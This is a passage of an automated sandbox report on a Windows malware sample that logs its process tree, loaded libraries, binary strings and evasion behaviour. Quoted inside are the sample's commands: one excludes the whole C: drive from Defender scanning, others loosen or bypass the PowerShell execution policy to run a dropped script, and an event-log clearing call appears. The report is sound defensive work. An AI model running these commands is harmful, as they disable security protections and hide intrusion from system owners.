                              Source: HGwpjJUqhW.exe String found in binary or memory: -ADDCUSTOMCOLORBUTTON_CAP=Add to Custom Colors
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe File read: C:\Users\user\Desktop\HGwpjJUqhW.exe
                              Source: unknown Process created: C:\Users\user\Desktop\HGwpjJUqhW.exe "C:\Users\user\Desktop\HGwpjJUqhW.exe"
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Process created: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe "C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe"
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Section loaded: version.dll, wsock32.dll, uxtheme.dll, msimg32.dll, dwmapi.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, sspicli.dll, mswsock.dll, msvcp140.dll, vcruntime140.dll, wininet.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll, ntmarta.dll, apphelp.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, taskschd.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Section loaded: version.dll, wsock32.dll, uxtheme.dll, msimg32.dll, dwmapi.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, sspicli.dll, mswsock.dll, msvcp140.dll, vcruntime140.dll, wininet.dll, winmm.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, dxgi.dll, dinput8.dll, inputhost.dll, coremessaging.dll, propsys.dll, wintypes.dll, coreuicomponents.dll, ntmarta.dll, resourcepolicyclient.dll, devenum.dll, devobj.dll, msasn1.dll, msdmo.dll, avicap32.dll, msvfw32.dll, windowscodecs.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, kdscli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                              Source: HGwpjJUqhW.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: HGwpjJUqhW.exe Static file information: File size 5289240 > 1048576
                              Source: HGwpjJUqhW.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2d9400
                              Source: HGwpjJUqhW.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1ef400
                              Source: Binary string: \Release\Code_Shellcode.pdb source: HGwpjJUqhW.exe, HGwpjJUqhW.exe, 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                              Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: HGwpjJUqhW.exe, 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                              Source: Binary string: System.Management.Automation.pdbqZ source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806383583.0000000007002000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workplace\Androws\p-7d0bede0cc4642bcb2fb80f584c30f51\1\Build\bin\Release\AndrowsInstaller.pdb source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr
                              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb& source: powershell.exe, 0000000B.00000002.1806383583.0000000007002000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.dr
                              Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb$ source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbp4 source: powershell.exe, 0000000B.00000002.1814728739.00000000081E1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workplace\Androws\p-7d0bede0cc4642bcb2fb80f584c30f51\1\Build\bin\Release\AndrowsInstaller.pdbN source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr

                              Data Obfuscation

                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Unpacked PE file: 0.2.HGwpjJUqhW.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03627490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary, 5_2_03627490
                              Source: HGwpjJUqhW.exe Static PE information: real checksum: 0x5142eb should be: 0x5193ed
                              Source: HGwpjJUqhW.exe.0.dr Static PE information: real checksum: 0x5142eb should be: 0x5193ed
                              Source: pc_yyb_2700200680_installer[1].exe.0.dr Static PE information: section name: _RDATA
                              Source: pc_yyb_2700200680_installer[1].exe.0.dr Static PE information: section name: .QMGuid
                              Source: pc_yyb_2700200680_installer.exe.0.dr Static PE information: section name: _RDATA
                              Source: pc_yyb_2700200680_installer.exe.0.dr Static PE information: section name: .QMGuid
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C6EBF8 push B61807CCh; retf 3_2_00C6EDD6
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C6AC8B push ecx; retf 3_2_00C6AC9A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C6AC9B push ecx; retf 3_2_00C6ACAA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C6AC1F push ecx; retf 3_2_00C6AC8A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_082048F0 push ecx; retf 3_2_082048FE
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08206570 push ecx; retf 3_2_0820657E
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03634345 push ecx; ret 5_2_03634358
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03642470 push ebp; retf 5_2_03642474
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03642471 push ebp; retf 5_2_03642474
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03642450 push ebp; retf 5_2_03642474
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_02C368B8 push 691402C3h; ret 5_2_02C368C2
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_02C4FE9A push ecx; ret 5_2_02C4FEBF
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_02C39DF5 push ecx; ret 5_2_02C39E08
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0288CAFF push eax; retf 5_2_0288CB00
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0288CB0B push 701000CBh; retf 5_2_0288CB10
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0288CB07 pushad ; retf 5_2_0288CB08
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0288CB61 pushfd ; retf 5_2_0288CB64
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_02889DCC push ecx; ret 5_2_02889DDF
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_034B3D04 push ecx; ret 5_2_034B3D17
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00D899B5 push esp; iretd 11_2_00D899B9
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\pc_yyb_2700200680_installer[1].exe
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe File created: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe File created: C:\Users\user\Downloads\pc_yyb_2700200680_installer.exe

                              Hooking and other Techniques for Hiding and Protection

                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_0362B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog, 5_2_0362B3C0
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
